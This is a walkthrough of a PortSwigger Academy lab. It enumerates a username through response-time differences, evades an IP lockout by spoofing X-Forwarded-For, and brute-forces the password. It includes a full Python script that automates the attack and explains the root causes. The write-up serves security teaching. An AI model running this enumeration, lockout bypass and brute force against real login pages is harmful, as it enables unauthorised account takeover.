Solving PortSwigger Academy: Username enumeration via response timing
In this lab we first need to enumerate a valid username and, once we have it, brute-force that user's password. We already did this in the previous lab, so what is new? Here the login response carries no visible difference for a wrong username; instead, if the username is correct and we supply a very long string in the password field, the server takes noticeably longer to respond (presumably because the password is only checked when the username exists). On top of that, our IP gets blocked after a few invalid attempts.
Let's visit the lab. Objective: "This lab is vulnerable to username enumeration using its response times. To solve the lab, enumerate a valid username, brute-force this user's password, then access their account page."
When we click on My account, we see the login page.

Let's first log in with the provided credentials (user 'wiener'). After logging in, I sent the login POST request to Repeater. First I tried it with a long password string and noted the response time.

Now let's send the same request with a random (non-existent) username.

Comparing the response times of the two requests shows a significant difference: the valid user took much longer, while the invalid user came back quickly. That gap is our enumeration oracle.
Let's repeat the same request a few more times for user 'wiener' to check that the timing is consistent.

After around 4 or 5 attempts, we get a message saying we need to wait 30 minutes before trying again. We need to bypass this. While searching I came across this article on rate-limit bypass.

We need to try the headers above one by one and watch the response. The very first header still gives the same "too many attempts" response.

Let's try another one, X-Forwarded-For. This time there is no warning, so this is the header we need to use: the application takes the client IP from the client-supplied X-Forwarded-For value when it keys its rate limit, so every new value we put in the header counts as a fresh "IP".

Now let's figure out after how many attempts we get blocked. It looks like it is after 3 failed attempts per IP. After that I changed the IP in the header and it started working again, so the safest approach is to give every single request its own IP.
Send the request to Intruder. This time we have to fuzz two things:
- The last octet of the IP in the X-Forwarded-For header, so no IP is ever reused.
- The username, keeping the long password string from the Repeater test in the password field.

We also need to use the attack type 'Pitchfork', which walks both payload sets in lockstep so that each username attempt goes out with its own X-Forwarded-For value (Cluster bomb would reuse IPs across usernames and trip the lockout). You can find the difference between the attack types here.
For the first payload set (the IP octet) I used the Numbers payload type.

For the second payload set I used the username list provided in the lab.

Let's start the attack and see what we get. All responses come back as 200 OK with almost the same length, so status and length tell us nothing. But if we sort by the Response received column, the user 'activestat' stands out with a response time of 1354 ms. We found the correct username. Now we need to brute-force the password with the same setup: Pitchfork, a fresh IP octet per request, the username fixed to 'activestat', and the lab's password list in the password position.
For the word 'freedom', we received a 302 redirect instead of 200, which means it is the correct password.
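For completeness, here is the whole attack as a Python script rather than Intruder clicks. This is an added example, not code from the original write-up or from PortSwigger: it rotates the X-Forwarded-For value on every request, flags the username whose response time is an outlier, then brute-forces the password until a 302 comes back. The lab URL, the form field names `username`/`password`, the 10.0.x.x spoofed addresses and the 3-attempts-per-IP lockout threshold are assumptions (the threshold is the one observed above); `simulated_send` is a constructed stand-in for the lab so the script runs offline, and `http_send` is the real sender to swap in.

```python
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request

# Placeholder lab URL (assumption, not taken from the write-up): point it at your own instance.
LOGIN_URL = "https://YOUR-LAB-ID.web-security-academy.net/login"
# A long password makes the (slow) password check dominate the response time
# whenever the username exists, so the timing gap is easy to spot.
LONG_PASSWORD = "A" * 100


def rotating_ips(start=0):
    """Yield a fresh X-Forwarded-For value for every request.

    The lab locks an "IP" after 3 failed attempts, so each request is sent
    from a new spoofed address and we never hit the lockout.
    """
    n = start
    while True:
        yield f"10.0.{n // 254}.{n % 254 + 1}"  # 10.0.0.1 ... 10.0.0.254, 10.0.1.1 ...
        n += 1


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: the 302 itself is the login-success signal."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_send(username, password, ip, timeout=10.0):
    """POST the login form with a spoofed X-Forwarded-For; return (status, seconds).

    Assumes the form fields are named `username` and `password`.
    """
    body = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(LOGIN_URL, data=body, headers={"X-Forwarded-For": ip})
    opener = urllib.request.build_opener(_NoRedirect)
    started = time.perf_counter()
    try:
        with opener.open(req, timeout=timeout) as resp:
            status = resp.status
    except urllib.error.HTTPError as err:  # 302 surfaces here because we refused to follow it
        status = err.code
    return status, time.perf_counter() - started


def simulated_send(valid_user="activestat", valid_pw="freedom", lockout=3):
    """Constructed stand-in for the lab so the script runs offline.

    Models the two flaws from the write-up: the password is only compared
    (slowly, proportional to its length) when the username exists, and the
    per-"IP" lockout keys on the client-supplied X-Forwarded-For value.
    """
    failures = {}

    def send(username, password, ip):
        if failures.get(ip, 0) >= lockout:
            return 200, 0.05  # "too many attempts" page: fast, leaks nothing
        if username != valid_user:
            status, elapsed = 200, 0.05  # unknown user: password never checked
        elif password == valid_pw:
            status, elapsed = 302, 0.06  # success: redirect to the account page
        else:
            status, elapsed = 200, 0.05 + 0.01 * len(password)  # valid user: slow compare
        if status != 302:
            failures[ip] = failures.get(ip, 0) + 1
        return status, elapsed
    return send


def enumerate_username(candidates, send, ips, repeats=1, factor=3.0):
    """Return (likely_valid_users, timings).

    Each candidate is tried with LONG_PASSWORD from a fresh IP; the per-user
    time is the median of `repeats` tries to smooth network jitter. A user is
    flagged when it is `factor` times slower than the median over all users,
    which works because almost every name in a wordlist is invalid and fast.
    """
    timings = {}
    for user in candidates:
        samples = [send(user, LONG_PASSWORD, next(ips))[1] for _ in range(repeats)]
        timings[user] = statistics.median(samples)
    baseline = statistics.median(timings.values())
    return [u for u, t in timings.items() if t > factor * baseline], timings


def brute_force_password(username, passwords, send, ips):
    """Try each password from a fresh IP; the first 302 is the correct one."""
    for pw in passwords:
        status, _ = send(username, pw, next(ips))
        if status == 302:
            return pw
    return None


if __name__ == "__main__":
    # Offline run against the simulation; swap simulated_send() for http_send
    # (and fill in LOGIN_URL) to run it against a real lab instance.
    send = simulated_send()
    ips = rotating_ips()
    users = ["admin", "carlos", "activestat", "root", "guest", "test"]  # constructed sample list
    found, timings = enumerate_username(users, send, ips, repeats=2)
    for u, t in sorted(timings.items(), key=lambda kv: -kv[1]):
        print(f"{u:12s} {t * 1000:7.0f} ms")
    print("valid username(s):", found)
    if found:
        print("password:", brute_force_password(found[0], ["password", "123456", "freedom"], send, ips))
```

Two design points worth keeping when you run this for real: measure each candidate more than once (`repeats`) and compare against the median of the whole list rather than a fixed threshold, because network jitter on a single request can easily exceed the gap between a valid and an invalid user; and never reuse a spoofed IP, since the lockout page responds quickly and would make a valid username look invalid.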


The root causes of this vulnerability are:
- A rate limit that is trivially bypassed because it trusts the client-controlled X-Forwarded-For header as the source IP.
- Different processing time for a correct and an incorrect username (the password is only checked when the username exists), which leaks which accounts are valid.
Hope you liked it, see you in the next write-up.